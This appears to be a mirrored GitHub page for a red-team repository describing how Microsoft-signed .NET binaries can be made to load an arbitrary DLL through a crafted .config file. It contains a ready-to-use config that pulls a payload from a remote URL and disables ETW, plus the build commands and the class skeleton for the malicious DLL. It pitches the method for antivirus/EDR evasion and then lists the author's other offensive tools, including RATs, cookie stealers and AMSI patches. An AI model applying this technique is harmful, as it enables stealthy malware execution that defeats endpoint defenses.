Mr-Un1k0d3r/.NetConfigLoader

Stars
223
Rank 178,458 (Top 4 %)
Language
Created about 1 year ago
Updated about 1 year ago

Mr-Un1k0d3r/.NetConfigLoader

Mr-Un1k0d3r

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

.net config loader

.NetConfigLoader

List of .Net application signed by Microsoft that can be used to load a dll via a .config file. Ideal for EDR/AV evasion and execution policy bypass.

<configuration>
   <runtime>
      <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
         <dependentAssembly>
            <assemblyIdentity name="DLLNAME" publicKeyToken="deadbeef1337" culture="neutral" />
            <codeBase version="0.0.0.0" href="https://mr.un1k0d3r.world/payload"/>
         </dependentAssembly>
      </assemblyBinding>
      <etwEnable enabled="false" />
      <appDomainManagerAssembly value="DLLNAME, Version=0.0.0.0, Culture=neutral, PublicKeyToken=deadbeef1337" />
      <appDomainManagerType value="CLASSNAME" />
   </runtime>
</configuration>

Example:

msdeploy.exe you need to create msdeploy.exe.config and add the XML data provided above.

List of .Net Signed Microsoft Binaries

952 files on my system. List here: Signed Binaries

Compiling the DLL

The DLL needs to have strong name

sn.exe -k key.snk

csc.exe /t:library /keyfile:key.snk /out:my.dll Program.cs

Getting the strong name information for the .config file

PS> [System.Reflection.AssemblyName]::GetAssemblyName("C:\full\path\to\dll\my.dll").FullName

The DLL Structure

using System;
 
public sealed class CLASSNAME : AppDomainManager
{
    
    public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
    {  
         
        Program.Main(null);
          
        return;
    }
}

EDRs

PowerLessShell

Run PowerShell command without invoking powershell.exe

DKMC

DKMC - Dont kill my cat - Malicious payload evasion tool

SCShell

Fileless lateral movement tool that relies on ChangeServiceConfigA to run command

RedTeamPowershellScripts

Various PowerShell scripts that may be useful during red team exercise

MaliciousMacroGenerator

Malicious Macro Generator

ThunderShell

Python / C# Unmanaged PowerShell based RAT

RedTeamCSharpScripts

C# Script used for Red Team

RedTeamCCode

Red Team C code repo

CatMyPhish

Search for categorized domain

PoisonHandler

lateral movement techniques that can be used during red team exercises

MaliciousClickOnceGenerator

Quick Malicious ClickOnceGenerator for Red Team

ADHuntTool

official repo for the AdHuntTool (part of the old RedTeamCSharpScripts repo)

Windows-SignedBinary

Shellcoding

Shellcoding utilities

ATP-PowerShell-Scripts

Microsoft Signed PowerShell scripts

WindowsDllsExport

A list of all the DLLs export in C:\windows\system32\

AMSI-ETW-Patch

Patch AMSI and ETW

DLLsForHackers

Dll that can be used for side loading and other attack vector.

MaliciousDLLGenerator

DLL Generator for side loading attack

SCT-obfuscator

Cobalt Strike SCT payload obfuscator

RedTeamScripts

Repo with various Red Team scripts

Elevate-System-Trusted-BOF

Cookie-Graber-BOF

C or BOF file to extract WebKit master key to decrypt user cookie

SPFAbuse

SPF are not as strong as you may think. Red Team tool to send email on behalf of your target corp

RemoteProcessInjection

C# remote process injection utility for Cobalt Strike

Base64-Obfuscator

Simple PowerShell Base64 encoder to avoid detection of your malicious payload

SearchIPOwner

Search public IP owner through ARIN

RedTeamFSharp

Red Team Toolset written in F# (Experimental)

SideChannelAttack

Side Channel script

BOFCode

Bunch of BOF files

blog.mr.un1k0d3r.com

Mr.Un1k0d3r.com blog

MsGraphFunzy

Scripts to interact with Microsoft Graph APIs